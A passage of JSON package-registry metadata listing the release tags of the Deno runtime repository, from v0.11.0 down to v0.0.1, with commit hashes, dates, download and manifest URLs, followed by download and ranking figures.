7T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:05:41.529Z","dependent_packages_count":0,"downloads":484832,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":96.39774052925645,"dependent_repos_count":25.31344016700436,"dependent_packages_count":